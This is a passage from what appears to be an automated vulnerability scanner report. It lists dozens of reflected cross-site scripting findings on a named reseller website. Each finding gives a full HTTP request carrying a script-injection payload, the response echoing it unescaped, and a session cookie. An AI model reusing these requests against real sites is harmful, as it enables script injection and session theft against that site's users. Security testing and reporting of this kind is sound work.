Path:	/detail/7/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ee034<script>alert(1)</script>a66daae39e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/rating.phpee034<script>alert(1)</script>a66daae39e5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/rating.phpee034<script>alert(1)</script>a66daae39e5 was not found on this server.</p>
...[SNIP]...

2.3562. http://www.resellerbase.com/detail/7/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e7a20<script>alert(1)</script>9d49c60f48b94467d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/7/rating.phpe7a20<script>alert(1)</script>9d49c60f48b94467d?id=7&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/rating.phpe7a20<script>alert(1)</script>9d49c60f48b94467d?id=7&rating=5 was not found on this server.</p>
...[SNIP]...

2.3563. http://www.resellerbase.com/detail/7/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4077<script>alert(1)</script>c8802128fde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/rating.php?e4077<script>alert(1)</script>c8802128fde=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/rating.php?e4077<script>alert(1)</script>c8802128fde=1 was not found on this server.</p>
...[SNIP]...

2.3564. http://www.resellerbase.com/detail/7/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4dcfe<script>alert(1)</script>ba751d9bf3623c175 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/7/rating.php/4dcfe<script>alert(1)</script>ba751d9bf3623c175?id=7&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/rating.php/4dcfe<script>alert(1)</script>ba751d9bf3623c175?id=7&rating=5 was not found on this server.</p>
...[SNIP]...

2.3565. http://www.resellerbase.com/detail/7/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8536<script>alert(1)</script>75160a3444a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile8536<script>alert(1)</script>75160a3444a/7/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile8536<script>alert(1)</script>75160a3444a/7/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3566. http://www.resellerbase.com/detail/7/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31508<script>alert(1)</script>6549f35cbc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/731508<script>alert(1)</script>6549f35cbc3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/731508<script>alert(1)</script>6549f35cbc3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3567. http://www.resellerbase.com/detail/7/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 84dbf<script>alert(1)</script>2810e6acca0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/search.php84dbf<script>alert(1)</script>2810e6acca0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php84dbf<script>alert(1)</script>2810e6acca0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3568. http://www.resellerbase.com/detail/7/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cbbf7<a>10fddf5b5ce was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/search.php?keyword=search...&Submit3=Searchcbbf7<a>10fddf5b5ce&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php?keyword=search...&Submit3=Searchcbbf7<a>10fddf5b5ce&opt=2 was not found on this server.</p>
...[SNIP]...

2.3569. http://www.resellerbase.com/detail/7/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 561ba<a>5fbd0e4775b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/search.php?keyword=search...561ba<a>5fbd0e4775b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php?keyword=search...561ba<a>5fbd0e4775b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3570. http://www.resellerbase.com/detail/7/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63689<script>alert(1)</script>40b983b56f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/search.php?keyword=search...&Submit3=Search&opt=2&63689<script>alert(1)</script>40b983b56f7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php?keyword=search...&Submit3=Search&opt=2&63689<script>alert(1)</script>40b983b56f7=1 was not found on this server.</p>
...[SNIP]...

2.3571. http://www.resellerbase.com/detail/7/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/7/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 38655<a>8dd74fec702 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/7/search.php?keyword=search...&Submit3=Search&opt=238655<a>8dd74fec702 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/search.php?keyword=search...&Submit3=Search&opt=238655<a>8dd74fec702 was not found on this server.</p>
...[SNIP]...

2.3572. http://www.resellerbase.com/detail/7/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 24b4e<script>alert(1)</script>dd560e662bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail24b4e<script>alert(1)</script>dd560e662bc/7/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail24b4e<script>alert(1)</script>dd560e662bc/7/themes/ was not found on this server.</p>
...[SNIP]...

2.3573. http://www.resellerbase.com/detail/7/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 932be<script>alert(1)</script>73f8236ffd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7932be<script>alert(1)</script>73f8236ffd3/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3574. http://www.resellerbase.com/detail/7/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1fe4<script>alert(1)</script>36c43cc17e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themesf1fe4<script>alert(1)</script>36c43cc17e3/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themesf1fe4<script>alert(1)</script>36c43cc17e3/ was not found on this server.</p>
...[SNIP]...

2.3575. http://www.resellerbase.com/detail/7/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f99c2<script>alert(1)</script>dc6a4637566 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/?f99c2<script>alert(1)</script>dc6a4637566=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/?f99c2<script>alert(1)</script>dc6a4637566=1 was not found on this server.</p>
...[SNIP]...

2.3576. http://www.resellerbase.com/detail/7/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe3b9<script>alert(1)</script>d4d08bf8261 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfe3b9<script>alert(1)</script>d4d08bf8261/7/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfe3b9<script>alert(1)</script>d4d08bf8261/7/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3577. http://www.resellerbase.com/detail/7/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c944<script>alert(1)</script>c5696da83b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/72c944<script>alert(1)</script>c5696da83b5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/72c944<script>alert(1)</script>c5696da83b5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3578. http://www.resellerbase.com/detail/7/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 458ef<script>alert(1)</script>6e01fe9e035 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes458ef<script>alert(1)</script>6e01fe9e035/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes458ef<script>alert(1)</script>6e01fe9e035/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3579. http://www.resellerbase.com/detail/7/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee583<script>alert(1)</script>8cbbd828715 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmosee583<script>alert(1)</script>8cbbd828715/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/7/themes/kosmosee583<script>alert(1)</script>8cbbd828715/ was not found on this server.</p>
...[SNIP]...

2.3580. http://www.resellerbase.com/detail/7/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2b3c8<script>alert(1)</script>007c239e86d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/7/themes/kosmos/?2b3c8<script>alert(1)</script>007c239e86d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
